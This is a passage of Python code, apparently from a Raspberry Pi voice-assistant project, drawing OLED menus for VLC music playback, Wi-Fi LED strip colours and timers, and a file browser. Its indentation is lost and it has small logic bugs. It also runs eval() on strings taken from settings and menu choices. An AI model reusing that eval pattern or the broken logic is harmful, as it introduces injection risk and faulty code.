if mop == 4:
draw.polygon([(44,40), (54,50), (44,60)], outline=255, fill=255)
else:
draw.polygon([(44,40), (54,50), (44,60)], outline=255, fill=0)
while t > 0 :
draw.rectangle((lx,ly,lx + 4,ly), outline=255, fill=255)
lx = lx + 6
t = t - 1
if mop == 3:
draw.rectangle((3, 40, 8, 60), outline=255, fill=255)
draw.polygon([(19,40), (9,50), (19,60)], outline=255, fill=255)
draw.polygon([(30,40), (20,50), (30,60)], outline=255, fill=255)
else:
draw.rectangle((3, 40, 8, 60), outline=255, fill=0)
draw.polygon([(19,40), (9,50), (19,60)], outline=255, fill=0)
draw.polygon([(30,40), (20,50), (30,60)], outline=255, fill=0)
if mop == 5:
draw.polygon([(67,40), (77,50), (67,60)], outline=255, fill=255)
draw.polygon([(78,40), (88,50), (78,60)], outline=255, fill=255)
draw.rectangle((89, 40, 94, 60), outline=255, fill=255)
else:
draw.polygon([(67,40), (77,50), (67,60)], outline=255, fill=0)
draw.polygon([(78,40), (88,50), (78,60)], outline=255, fill=0)
draw.rectangle((89, 40, 94, 60), outline=255, fill=0)
if mop == 6:
draw.rectangle((104, 40, 124, 60), outline=255, fill=255)
else:
draw.rectangle((104, 40, 124, 60), outline=255, fill=0)
disp.image(image)
Myassistant.refrech_error()
buton = 20000
while self.affichage == 'music' and buton > 0:
if not len(self.buton) == 0:
self.veil = 0
if self.buton[0] == 0:
del self.buton[0]
if mop == 0:
mop = 4
else:
mop = 0
elif self.buton[0] == 1:
del self.buton[0]
if mop == 0:
mop = 4
else:
if mop == 1:
vol = Myassistant.volume_get()
Myassistant.volume_set(int(Myassistant.select_cursor(self,100,0,5,vol,'%','volume')))
elif mop == 2:
if self.act_cron[0] == ['X','XX','XX','vlc.stop_vlc()#cantdel']:
slt = Myassistant.select_time(self,'--', '--', '-', 'sleep time',True)
else:
slt = Myassistant.select_time(self,self.act_cron[0][1], self.act_cron[0][2], self.act_cron[0][0], 'sleep time',True)
if slt[0] == '--' or slt[1] == '--':
self.act_cron[0] = ['X','XX','XX','vlc.stop_vlc()#cantdel']
self.var_save["Music stop"] = str('X,XX,XX')
else:
self.act_cron[0] = [slt[2],slt[0],slt[1],'vlc.stop_vlc()#cantdel']
self.var_save["Music stop"] = str(slt[2] + ',' + slt[0] + ',' + slt[1])
Myassistant.save_var_in_file(self)
elif mop == 3:
vlc.previous_vlc()
elif mop == 4:
if vlc.is_vlc_playing():
if vlc.is_pause():
vlc.resume_vlc()
else:
vlc.pause_vlc()
elif not vlc.is_vlc_playing():
if Myassistant.have_network(time.strftime("%H"),time.strftime("%M")):
mscel = Myassistant.select_list(self,[['Radios','radios'],['File','file'],['Exit','exit']],'music')
if mscel == 'radios':
radiona = []
for hgj in settings.get("Radios"):
radiona.append(hgj)
radsel = Myassistant.select_list(self,radiona,'Radios')
if not radsel == None:
if Myassistant.have_network(time.strftime("%H"),time.strftime("%M")):
vlc.play_audio_file(radsel)
elif mscel == 'file':
j = Myassistant.select_path(self,settings.get("Path to your music"),True)
if not j == None:
disp.clear()
Myassistant.refrech_error()
if os.path.isdir(j):
vlc.play_audio_folder(j)
else:
vlc.play_audio_file(j)
time.sleep(0.2)
while not len(self.buton) == 0:
del self.buton[0]
else:
j = Myassistant.select_path(self,settings.get("Path to your music"),True)
if not j == None:
disp.clear()
Myassistant.refrech_error()
if os.path.isdir(j):
vlc.play_audio_folder(j)
else:
vlc.play_audio_file(j)
time.sleep(0.2)
while not len(self.buton) == 0:
del self.buton[0]
else:
vlc.resume_vlc()
elif mop == 5:
vlc.next_vlc()
elif mop == 6:
vlc.stop_vlc()
elif self.buton[0] == 2:
del self.buton[0]
if mop == 0:
Myassistant.execute_next(self,'right')
elif not mop + 1 > 6:
mop = mop + 1
else:
mop = 1
elif self.buton[0] == 3:
del self.buton[0]
if mop == 0:
Myassistant.execute_next(self,'left')
elif not mop - 1 < 1:
mop = mop - 1
else:
mop = 6
self.veil = 0
if not len(self.buton) == 0:
buton = 5
else:
buton = 0
buton = buton - 1
def aff_led_strip(self):
self.affichage = 'led strip'
try:
ifwantreload = 0
cont = True
name = 'All'
name_wifi_led = []
ip_wifi_led=[]
listwifi={}
led = flux_led.__main__
for wifi_led in settings.get('Led strips names'):
listwifi[str(wifi_led[0])]=led.WifiLedBulb(wifi_led[1],timeout=1)
name_wifi_led.append(wifi_led[0])
ip_wifi_led.append(wifi_led[1])
colorlist = []
coloraction = []
for color in settings.get('Custom colors'):
colorlist.append(color[0])
coloraction.append(color[1])
selectlist = round((len(colorlist) - 1) / 2)
selection = [False, 10]
while cont and self.affichage == 'led strip' :
image = Image.new('1', (disp.width,disp.height))
draw = ImageDraw.Draw(image)
if name == 'All':
r = 0
g = 0
b = 0
w = 0
ison = False
brightnes = 0
i = 0
for adress in listwifi:
wifiled = listwifi[adress]
#print('e')
wifiled.refreshState()
#print('a')
y = wifiled.getRgbw()
r = r + y[0]
g = g + y[1]
b = b + y[2]
w = w + y[3]
if wifiled.is_on:
ison = True
brightnes = brightnes + wifiled.brightness
i = i + 1
r = round(r/i)
g = round(g/i)
b = round(b/i)
w = round(w/i)
brightnes = round(brightnes/i)
else:
wifiled = listwifi[name]
wifiled.refreshState()
y = wifiled.getRgbw()
r = y[0]
g = y[1]
b = y[2]
w = y[3]
ison = wifiled.is_on
brightnes = wifiled.brightness
brightnessim = Image.open('~/google-assistant/src/images/led_strip/brightness.jpg')
brightnessim = brightnessim.resize((17,17))
brightnessim = ImageOps.invert(brightnessim)
image.paste(brightnessim, (28,12))
draw.text(((127 - (len(name) * 6)) / 2,0), name, font=font, fill=225)
if ison:
if selection[1] == 0:
if selection[0]:
draw.rectangle((0, 15, (len(str('on')) * 6) + 2, 25), outline=255, fill=255)
draw.text((2,15), 'on', font=font, fill=0)
else:
draw.rectangle((0, 15, (len(str('on')) * 6) + 2, 25), outline=255, fill=0)
draw.text((2,15), 'on', font=font, fill=225)
else:
draw.text((2,15), 'on', font=font, fill=225)
else:
if selection[1] == 0:
if selection[0]:
draw.rectangle((0, 15, (len(str('off')) * 6) + 2, 25), outline=255, fill=255)
draw.text((2,15), 'off', font=font, fill=0)
else:
draw.rectangle((0, 15, (len(str('off')) * 6) + 2, 25), outline=255, fill=0)
draw.text((2,15), 'off', font=font, fill=225)
else:
draw.text((2,15), 'off', font=font, fill=225)
if selection[1] == 1:
if selection[0]:
draw.rectangle((44, 15, (len(str(brightnes)) * 6) + 46, 25), outline=255, fill=255)
draw.text((46,15), str(brightnes), font=font, fill=0)
else:
draw.rectangle((44, 15, (len(str(brightnes)) * 6) + 46, 25), outline=255, fill=0)
draw.text((46,15), str(brightnes), font=font, fill=225)
else:
draw.text((46,15), str(brightnes), font=font, fill=225)
if selection[1] == 2:
draw.rectangle((74, 15, 88, 25), outline=255, fill=0)
draw.line((76,17,86,17), fill=255)
draw.line((76,19,86,19), fill=255)
draw.line((76,21,86,21), fill=255)
draw.line((76,23,86,23), fill=255)
if selection[1] == 3:
draw.rectangle((99, 15, (len(str('+')) * 6) + 101, 25), outline=255, fill=0)
draw.text((101,15), '+', font=font, fill=225)
if selection[1] == 4:
draw.rectangle((117, 15, 127, 25), outline=255, fill=0)
alar = Image.open('~/google-assistant/src/images/led_strip/alarme.jpg')
alar = alar.resize((7,7))
alar = ImageOps.invert(alar)
image.paste(alar, (119,17))
draw.line((122,21,122,19), fill=255)
draw.line((122,21,123,21), fill=255)
xcenter = (127 - (len(colorlist[selectlist]) * 6)) / 2
if selection[1] == 5:
draw.rectangle((0, 29, 127, 48), outline=255, fill=0)
if selection[0]:
draw.rectangle((xcenter - 4, 31, (len(colorlist[selectlist]) * 6) + xcenter + 3, 46), outline=255, fill=0)
i = selectlist - 1
while i > -1:
xcenter = xcenter - (12 + (len(colorlist[i]) * 6))
i = i - 1
draw.text((xcenter,33), " ".join(colorlist), font=font, fill=225)
if selection[1] == 6:
if selection[0]:
draw.rectangle((8, 53, (len(str(r)) * 6) + 11, 63), outline=255, fill=255)
draw.text((10,53), str(r), font=font, fill=0)
else:
draw.rectangle((8, 53, (len(str(r)) * 6) + 11, 63), outline=255, fill=0)
draw.text((10,53), str(r), font=font, fill=225)
draw.text((0,53), 'R', font=font, fill=225)
else:
draw.text((0,53), 'R:', font=font, fill=225)
draw.text((10,53), str(r), font=font, fill=225)
if selection[1] == 7:
if selection[0]:
draw.rectangle((40, 53, (len(str(g)) * 6) + 43, 63), outline=255, fill=255)
draw.text((42,53), str(g), font=font, fill=0)
else:
draw.rectangle((40, 53, (len(str(g)) * 6) + 43, 63), outline=255, fill=0)
draw.text((42,53), str(g), font=font, fill=225)
draw.text((32,53), 'G', font=font, fill=225)
else:
draw.text((32,53), 'G:', font=font, fill=225)
draw.text((42,53), str(g), font=font, fill=225)
if selection[1] == 8:
if selection[0]:
draw.rectangle((72, 53, (len(str(b)) * 6) + 75, 63), outline=255, fill=255)
draw.text((74,53), str(b), font=font, fill=0)
else:
draw.rectangle((72, 53, (len(str(b)) * 6) + 75, 63), outline=255, fill=0)
draw.text((74,53), str(b), font=font, fill=225)
draw.text((64,53), 'B', font=font, fill=225)
else:
draw.text((64,53), 'B:', font=font, fill=225)
draw.text((74,53), str(b), font=font, fill=225)
if selection[1] == 9:
if selection[0]:
draw.rectangle((104, 53, (len(str(w)) * 6) + 107, 63), outline=255, fill=255)
draw.text((106,53), str(w), font=font, fill=0)
else:
draw.rectangle((104, 53, (len(str(w)) * 6) + 107, 63), outline=255, fill=0)
draw.text((106,53), str(w), font=font, fill=225)
draw.text((96,53), 'W', font=font, fill=225)
else:
draw.text((96,53), 'W:', font=font, fill=225)
draw.text((106,53), str(w), font=font, fill=225)
disp.image(image)
Myassistant.refrech_error()
buton = 20000
while self.affichage == 'led strip' and buton > 0:
#print('r')
if not len(self.buton) == 0:
self.veil = 0
if self.buton[0] == 0 :
del self.buton[0]
if selection[1] == 10:
selection[1] = 0
for adresr in listwifi:
wifiled = listwifi[adresr]
if not wifiled.isOn():
wifiled.turnOn()
else:
selection[1] = 10
elif self.buton[0] == 1 :
del self.buton[0]
if selection[1] == 2:
ledsearchaff = [['All','All']]
for sdna in name_wifi_led:
ledsearchaff.append([str(sdna),str(sdna)])
name = Myassistant.select_list(self,ledsearchaff,'select led strip')
if name == None:
name == 'All'
elif selection[1] == 3:
ffgddsj = Myassistant.select_list(self,[['Colors','color'],['Preset pattern','pattern'],['Exit','exit']],'choice')
if ffgddsj == 'pattern':
fgcolorpatname = ['seven color cross fade','red gradual change','green gradual change','blue gradual change','yellow gradual change','cyan gradual change','purple gradual change','white gradual change','red green cross fade','red blue cross fade','green blue cross fade','seven color strobe flash','red strobe flash','green strobe flash','blue strobe flash','yellow strobe flash','cyan strobe flash','purple strobe flash','white strobe flash','seven color jumping']
fgcolorpat = ['setPresetPattern(0x25,100)','setPresetPattern(0x26,100)','setPresetPattern(0x27,100)','setPresetPattern(0x28,100)','setPresetPattern(0x29,100)','setPresetPattern(0x2a,100)','setPresetPattern(0x2b,100)','setPresetPattern(0x2c,100)','setPresetPattern(0x2d,100)','setPresetPattern(0x2e,100)','setPresetPattern(0x2f,100)','setPresetPattern(0x30,100)','setPresetPattern(0x31,100)','setPresetPattern(0x32,100)','setPresetPattern(0x33,100)','setPresetPattern(0x34,100)','setPresetPattern(0x35,100)','setPresetPattern(0x36,100)','setPresetPattern(0x37,100)','setPresetPattern(0x38,100)']
collen = 0
mixcolornamepat = []
while collen < len(fgcolorpatname):
mixcolornamepat.append([str(fgcolorpatname[collen]),str(fgcolorpat[collen])])
collen = collen + 1
presety = Myassistant.select_list(self,mixcolornamepat,'preset pattern')
if not presety == None:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
eval('wifiled.' + str(presety))
else:
eval('wifiled.' + str(presety))
speed = Myassistant.select_cursor(self,100,0,5,100,"",'speed')
presety = str(presety).replace(',100)',','+str(speed)+')')
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
eval('wifiled.' + str(presety))
else:
eval('wifiled.' + str(presety))
elif ffgddsj == 'color':
jgiush = []
responscoled = flux_led.utils.get_color_names_list()
for tey in responscoled:
jgiush.append([tey,tey])
dflfd = Myassistant.select_search_list(self,jgiush)
if not dflfd == None:
resultintero = flux_led.utils.color_object_to_tuple(dflfd)
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
if wifiled.brightness+10 > 255 :
wifiled.setRgb(resultintero[0],resultintero[1],resultintero[2])
else:
wifiled.setRgb(resultintero[0],resultintero[1],resultintero[2])
else:
if brightnes+10 > 255:
wifiled.setRgb(resultintero[0],resultintero[1],resultintero[2])
else:
wifiled.setRgb(resultintero[0],resultintero[1],resultintero[2])
elif selection[1] == 4:
set_alarm_list = [['Set new alarm','newalarm'],
['Get alarm','getalarm'],
['Remove alarm',[[['All','removeall'],
['Specific alarm','removespecific'],
['Exit','exit']],'remove']],
['Exit','exit']]
setal = Myassistant.select_list(self,set_alarm_list,'led strip alarm')
if setal == 'newalarm':
selecttime = Myassistant.select_time(self,'--', '--', '-', 'new alarm',True)
if not (selecttime[0] == '--' or selecttime[1] == '--'):
color = Myassistant.select_led_strip_color_alarm(self)
Myassistant.set_word_aff(self, 'Loading please wait')
f = flux_led.LedTimer()
f.setActive()
f.setTime(int(selecttime[0]),int(selecttime[1]))
if selecttime[2] == '-':
f.setRepeatMask(flux_led.LedTimer.Everyday)
else:
if selecttime[2] == "Monday" :
f.setRepeatMask(flux_led.LedTimer.Mo)
elif selecttime[2] == "Tuesday" :
f.setRepeatMask(flux_led.LedTimer.Tu)
elif selecttime[2] == "Wednesday" :
f.setRepeatMask(flux_led.LedTimer.We)
elif selecttime[2] == "Thursday" :
f.setRepeatMask(flux_led.LedTimer.Th)
elif selecttime[2] == "Friday" :
f.setRepeatMask(flux_led.LedTimer.Fr)
elif selecttime[2] == "Saturday" :
f.setRepeatMask(flux_led.LedTimer.Sa)
elif selecttime[2] == "Sunday" :
f.setRepeatMask(flux_led.LedTimer.Su)
eval('f.'+str(color[1]))
if '[' in str(color[0]):
for adress in color[0]:
wifiled = led.WifiLedBulb(adress)
timeur = wifiled.getTimers()
timeur[5] = timeur[4]
timeur[4] = timeur[3]
timeur[3] = timeur[2]
timeur[2] = timeur[1]
timeur[1] = timeur[0]
timeur[0] = f
wifiled.sendTimers(timeur)
else:
wifiled = led.WifiLedBulb(color[0])
timeur = wifiled.getTimers()
timeur[5] = timeur[4]
timeur[4] = timeur[3]
timeur[3] = timeur[2]
timeur[2] = timeur[1]
timeur[1] = timeur[0]
timeur[0] = f
wifiled.sendTimers(timeur)
elif setal == 'getalarm':
lljsdj = []
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
timeur = wifiled.getTimers()
for t in timeur:
if not str(t) == 'Unset':
lljsdj.append([str(t),'any'])
else:
timeur = wifiled.getTimers()
for t in timeur:
if not str(t) == 'Unset':
lljsdj.append([str(t),'any'])
lljsdj.append(['Exit','any'])
rien = Myassistant.select_list(self,lljsdj,'led strip alarm')
elif setal == 'removespecific':
lljsdj = []
conteur = 0
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
timeur = wifiled.getTimers()
conteur = 0
for t in timeur:
if not str(t) == 'Unset':
lljsdj.append([str(t),str(adress)+','+str(conteur)])
conteur = conteur + 1
else:
timeur = wifiled.getTimers()
conteur = 0
for t in timeur:
if not str(t) == 'Unset':
lljsdj.append([str(t),str(conteur)])
conteur = conteur + 1
lljsdj.append(['Exit','exit'])
rien = Myassistant.select_list(self,lljsdj,'select alarm')
if ',' in str(rien):
ghhjf = rien.split(',')
wifiled = led.WifiLedBulb(ghhjf[0])
f = flux_led.LedTimer()
f.setActive(False)
timeur = wifiled.getTimers()
timeur[int(ghhjf[1])] = f
Myassistant.set_word_aff(self, 'Loading please wait')
wifiled.sendTimers(timeur)
while not len(self.buton) == 0:
del self.buton[0]
elif not rien == 'exit' and not rien == None:
f = flux_led.LedTimer()
f.setActive(False)
timeur = wifiled.getTimers()
timeur[int(rien)] = f
Myassistant.set_word_aff(self, 'Loading please wait')
wifiled.sendTimers(timeur)
while not len(self.buton) == 0:
del self.buton[0]
elif setal == 'removeall':
Myassistant.set_word_aff(self, 'Loading please wait')
f = flux_led.LedTimer()
f.setActive(False)
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
wifiled.sendTimers([f,f,f,f,f,f])
else:
wifiled.sendTimers([f,f,f,f,f,f])
elif not selection[1] == 10:
selection[0] = not selection[0]
if selection[0] and selection[1] == 5:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
try:
eval('wifiled.' + str(coloraction[selectlist]))
except:
print('Failed to execute : "' + str(coloraction[selectlist]) + '"')
else:
try:
eval('wifiled.' + str(coloraction[selectlist]))
except:
print('Failed to execute : "' + str(coloraction[selectlist]) + '"')
ifwantreload = 0
elif selection[1] == 10:
selection[1] = 0
for adresr in listwifi:
wifiled = listwifi[adresr]
if not wifiled.isOn():
wifiled.turnOn()
elif self.buton[0] == 2 :
del self.buton[0]
if selection[1] == 10:
cont = False
Myassistant.execute_next(self,'right')
elif selection[0]:
if selection[1] == 0:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
if ison:
wifiled.turnOff()
else:
wifiled.turnOn()
else:
if ison:
wifiled.turnOff()
else:
wifiled.turnOn()
elif selection[1] == 1:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if wifiled.brightness+10 > 255 :
wifiled.setRgbw(r=y[0],g=y[1],b=y[2],w=y[3],brightness=255)
else:
wifiled.setRgbw(r=y[0],g=y[1],b=y[2],w=y[3],brightness=wifiled.brightness+10)
else:
if brightnes+10 > 255:
wifiled.setRgbw(r=r,g=g,b=b,w=w,brightness=255)
else:
wifiled.setRgbw(r=r,g=g,b=b,w=w,brightness=brightnes+10)
elif selection[1] == 6:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if y[0]+10 > 255 :
wifiled.setRgbw(r=255,g=y[1],b=y[2],w=y[3])
else:
wifiled.setRgbw(r=y[0]+10,g=y[1],b=y[2],w=y[3])
else:
if r+10 > 255:
wifiled.setRgbw(r=255,g=g,b=b,w=w)
else:
wifiled.setRgbw(r=r+10,g=g,b=b,w=w)
elif selection[1] == 7:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if y[1]+10 > 255 :
wifiled.setRgbw(r=y[0],g=255,b=y[2],w=y[3])
else:
wifiled.setRgbw(r=y[0],g=y[1]+10,b=y[2],w=y[3])
else:
if g+10 > 255:
wifiled.setRgbw(r=r,g=255,b=b,w=w)
else:
wifiled.setRgbw(r=r,g=g+10,b=b,w=w)
elif selection[1] == 8:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if y[2]+10 > 255 :
wifiled.setRgbw(r=y[0],g=y[1],b=255,w=y[3])
else:
wifiled.setRgbw(r=y[0],g=y[1],b=y[2]+10,w=y[3])
else:
if g+10 > 255:
wifiled.setRgbw(r=r,g=g,b=255,w=w)
else:
wifiled.setRgbw(r=r,g=g,b=b+10,w=w)
elif selection[1] == 9:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if y[3]+10 > 255 :
wifiled.setRgbw(r=y[0],g=y[1],b=y[2],w=255)
else:
wifiled.setRgbw(r=y[0],g=y[1],b=y[2],w=y[3]+10)
else:
if w+10 > 255:
wifiled.setRgbw(r=r,g=g,b=b,w=255)
else:
wifiled.setRgbw(r=r,g=g,b=b,w=w+10)
elif selection[1] == 5:
if not selectlist + 1 > len(colorlist)-1:
selectlist = selectlist + 1
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
try:
eval('wifiled.' + str(coloraction[selectlist]))
except:
print('Failed to execute : "' + str(coloraction[selectlist]) + '"')
else:
try:
eval('wifiled.' + str(coloraction[selectlist]))
except:
print('Failed to execute : "' + str(coloraction[selectlist]) + '"')
ifwantreload = 0
else:
if not selection[1] + 1 > 9:
selection[1] = selection[1] + 1
else:
selection[1] = 0
elif self.buton[0] == 3 :
del self.buton[0]
if selection[1] == 10:
cont = False
Myassistant.execute_next(self,'left')
elif selection[0]:
if selection[1] == 0:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
if ison:
wifiled.turnOff()
else:
wifiled.turnOn()
else:
if ison:
wifiled.turnOff()
else:
wifiled.turnOn()
elif selection[1] == 1:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if wifiled.brightness-10 < 0 :
wifiled.setRgbw(r=y[0],g=y[1],b=y[2],w=y[3],brightness=0)
else:
wifiled.setRgbw(r=y[0],g=y[1],b=y[2],w=y[3],brightness=wifiled.brightness-10)
else:
if brightnes-10 < 0:
wifiled.setRgbw(r=r,g=g,b=b,w=w,brightness=0)
else:
wifiled.setRgbw(r=r,g=g,b=b,w=w,brightness=brightnes-10)
elif selection[1] == 6:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if y[0]-10 < 0 :
wifiled.setRgbw(r=0,g=y[1],b=y[2],w=y[3])
else:
wifiled.setRgbw(r=y[0]-10,g=y[1],b=y[2],w=y[3])
else:
if r-10 < 0:
wifiled.setRgbw(r=0,g=g,b=b,w=w)
else:
wifiled.setRgbw(r=r-10,g=g,b=b,w=w)
elif selection[1] == 7:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if y[1]-10 < 0 :
wifiled.setRgbw(r=y[0],g=0,b=y[2],w=y[3])
else:
wifiled.setRgbw(r=y[0],g=y[1]-10,b=y[2],w=y[3])
else:
if g-10 < 0:
wifiled.setRgbw(r=r,g=0,b=b,w=w)
else:
wifiled.setRgbw(r=r,g=g-10,b=b,w=w)
elif selection[1] == 8:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if y[2]-10 < 0 :
wifiled.setRgbw(r=y[0],g=y[1],b=0,w=y[3])
else:
wifiled.setRgbw(r=y[0],g=y[1],b=y[2]-10,w=y[3])
else:
if b-10 < 0:
wifiled.setRgbw(r=r,g=g,b=0,w=w)
else:
wifiled.setRgbw(r=r,g=g,b=b-10,w=w)
elif selection[1] == 9:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if y[3]-10 < 0 :
wifiled.setRgbw(r=y[0],g=y[1],b=y[2],w=0)
else:
wifiled.setRgbw(r=y[0],g=y[1],b=y[2],w=y[3]-10)
else:
if w-10 < 0:
wifiled.setRgbw(r=r,g=g,b=b,w=0)
else:
wifiled.setRgbw(r=r,g=g,b=b,w=w-10)
elif selection[1] == 5:
if not selectlist - 1 < 0:
selectlist = selectlist - 1
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
try:
eval('wifiled.' + str(coloraction[selectlist]))
except:
print('Failed to execute : "' + str(coloraction[selectlist]) + '"')
else:
try:
eval('wifiled.' + str(coloraction[selectlist]))
except:
print('Failed to execute : "' + str(coloraction[selectlist]) + '"')
ifwantreload = 0
else:
if not selection[1] - 1 < 0:
selection[1] = selection[1] - 1
else:
selection[1] = 9
ifwantreload = 0
if not len(self.buton) == 0:
buton = 5
else:
buton = 0
self.veil = 0
buton = buton - 1
except BrokenPipeError :
self.veil = 0
threading.Timer(0, Myassistant.aff_heure,[self]).start()
print('Failed : "led strip"')
def select_path(self, path, stetdff):
choice = True
selist = [15, 0]
memy = 3
x = 2
xpat = 0
direcpat = 0
direc = 0
while choice and not self.al:
try:
listaff = os.listdir(path)
except:
listaff = []
ct = len(listaff) - 1
while ct > -1:
if str(listaff[ct])[0] == '.' :
del listaff[ct]
ct = ct - 1
if listaff == []:
image = Image.new('1', (disp.width,disp.height))
draw = ImageDraw.Draw(image)
draw.text((xpat,0), path, font=font, fill=225)
draw.line((0, 12, 127, 12), fill=255)
disp.image(image)
Myassistant.refrech_error()
time.sleep(1)
xpat = 0
path = path.split("/")
del path[len(path) - 1]
path = "/".join(path)
if path == '':
path = '/'
selist = [15,0]
memy = 3
try:
listaff = os.listdir(path)
except:
path = '/'
listaff = os.listdir('/')
if listaff == []:
path = '/'
listaff = os.listdir('/')
ct = len(listaff) - 1
while ct > -1:
if str(listaff[ct])[0] == '.' :
del listaff[ct]
ct = ct - 1
image = Image.new('1', (disp.width,disp.height))
draw = ImageDraw.Draw(image)
if len(listaff[selist[1]]) * 6 > 124 :
if direc == 0 :
if len(listaff[selist[1]]) * 6 + x > 124 :
x = x - 4
else :
direc = 1
else :
x = x + 4
if x > 3 :
direc = 0
if len(path) * 6 > 128 :
if direcpat == 0 :
if len(path) * 6 + xpat > 128 :
xpat = xpat - 4
else :
direcpat = 1
else :
xpat = xpat + 4
if xpat > 1 :
direcpat = 0
draw.rectangle((0, selist[0], 127, selist[0] + 12), outline=255, fill=0)
y = memy
lllo = 0
while lllo < len(listaff):
y = y + 12
if lllo == selist[1]:
draw.text((x,y), str(listaff[lllo]), font=font, fill=225)
else :
draw.text((2,y), str(listaff[lllo]), font=font, fill=225)
lllo = lllo + 1
draw.rectangle((126, 16, 126, 26), outline=0, fill=0)
draw.rectangle((126, 28, 126, 38), outline=0, fill=0)
draw.rectangle((126, 40, 126, 50), outline=0, fill=0)
draw.rectangle((126, 52, 126, 62), outline=0, fill=0)
draw.rectangle((127, 16, 127, 26), outline=0, fill=0)
draw.rectangle((127, 28, 127, 38), outline=0, fill=0)
draw.rectangle((127, 40, 127, 50), outline=0, fill=0)
draw.rectangle((127, 52, 127, 62), outline=0, fill=0)
draw.rectangle((1, 16, 1, 26), outline=0, fill=0)
draw.rectangle((1, 28, 1, 38), outline=0, fill=0)
draw.rectangle((1, 40, 1, 50), outline=0, fill=0)
draw.rectangle((1, 52, 1, 62), outline=0, fill=0)
draw.rectangle((0, 0, 127, 14), outline=0, fill=0)
draw.text((xpat,0), path, font=font, fill=225)
draw.line((127, selist[0], 127, selist[0] + 12), fill=255)
draw.line((0, 12, 127, 12), fill=255)
disp.image(image)
Myassistant.refrech_error()
buton = 20000
while buton > 0 and not self.al:
self.veil = 0
if not len(self.buton) == 0:
if self.buton[0] == 0 :
del self.buton[0]
xpat = 0
path = path.split("/")
del path[len(path) - 1]
path = "/".join(path)
if path == '':
path = '/'
selist = [15,0]
memy = 3
elif self.buton[0] == 1 :
del self.buton[0]
xpat = 0
if stetdff:
thetime = 10
while thetime > 0:
time.sleep(0.1)
if GPIO.input(bround) == 1 :
thetime = -9
thetime = thetime - 1
while not len(self.buton) == 0:
del self.buton[0]
while not len(self.buton) == 0:
del self.buton[0]
else:
thetime = -10
if thetime == -10:
if path == '/':
path = '/' + listaff[selist[1]]
else:
path = path + '/' + listaff[selist[1]]
if os.path.isfile(path):
choice = False
else:
if path == '/':
path = '/' + listaff[selist[1]]
else:
path = path + '/' + listaff[selist[1]]
choice = False
selist = [15,0]
memy = 3
elif self.buton[0] == 2 :
del self.buton[0]
if not selist[1] + 1 > len(listaff) - 1:
selist = [selist[0] + 12,selist[1] + 1]
if selist[0] > 52 :
memy = memy - 12
selist[0] = 51
elif self.buton[0] == 3 :
del self.buton[0]
selist = [selist[0] - 12,selist[1] - 1]
if selist[1] < 0:
selist = [15, 0]
elif selist[0] < 14 :
memy = memy + 12
selist[0] = 15
if not len(self.buton) == 0:
buton = 5
else:
buton = 0
x = 2
if len(listaff[selist[1]]) * 6 > 124 :
buton = buton - 1
elif len(path) * 6 > 128 :
buton = buton - 1
if choice:
return None
else:
return path
def select_cursor(self, nmax, nmin, increment, start, unit, name):
cont = True
cu = start
while cont and not self.al:
image = Image.new('1', (disp.width,disp.height))
draw = ImageDraw.Draw(image)
draw.text(((127 - (len(name) * 6)) / 2,0), name, font=font, fill=225)
draw.line((10,31,117,31), fill = 255)
pos = ((107 / ((nmax - nmin) + 1)) * cu) + 10
draw.rectangle((pos - 2, 36, pos + 2, 26), outline=255, fill=255)
draw.text((pos - (len(str(cu) + unit) * 6) / 2 + 1,40), str(cu) + unit, font=font, fill=225)
disp.image(image)
Myassistant.refrech_error()
buton = True
while buton and not self.al:
self.veil = 0
if not len(self.buton) == 0:
if self.buton[0] == 0 :
del self.buton[0]
cont = False
elif self.buton[0] == 1 :
del self.buton[0]
cont = False
elif self.buton[0] == 2 :
del self.buton[0]
if not cu + increment > nmax:
cu = cu + increment
else:
cu = nmax
elif self.buton[0] == 3 :
del self.buton[0]
if not cu - increment < nmin:
cu = cu - increment
else:
cu = nmin
if not len(self.buton) == 0:
buton = True
else:
buton = False
return cu
def select_time(self, shour, sminu, sday, name,ops = False):
cont = True
sel = [False,0]
while cont and not self.al:
image = Image.new('1', (disp.width,disp.height))
draw = ImageDraw.Draw(image)
draw.text(((127 - (len(name) * 6)) / 2,0), name, font=font, fill=225)
draw.text(((128 - (len(sday) * 6)) / 2,32),sday, font=font, fill=225)
draw.text((43,20), shour + ' ' + sminu, font=font, fill=225)
if sel[1] == 2:
if sel[0] :
draw.rectangle((((128 - (len(sday) * 6)) / 2) - 2, 32, (((128 - (len(sday) * 6)) / 2) + len(sday) * 6) + 1, 44), outline=255, fill=255)
draw.text(((128 - (len(sday) * 6)) / 2,32),sday, font=font, fill=0)
else:
draw.rectangle((((128 - (len(sday) * 6)) / 2) - 2, 32, (((128 - (len(sday) * 6)) / 2) + len(sday) * 6) + 1, 44), outline=255, fill=0)
draw.text(((128 - (len(sday) * 6)) / 2,32),sday, font=font, fill=225)
elif sel[1] == 0:
if sel[0] :
draw.rectangle((41, 20, 56, 30), outline=255, fill=255)
draw.text((43,20), shour, font=font, fill=0)
else:
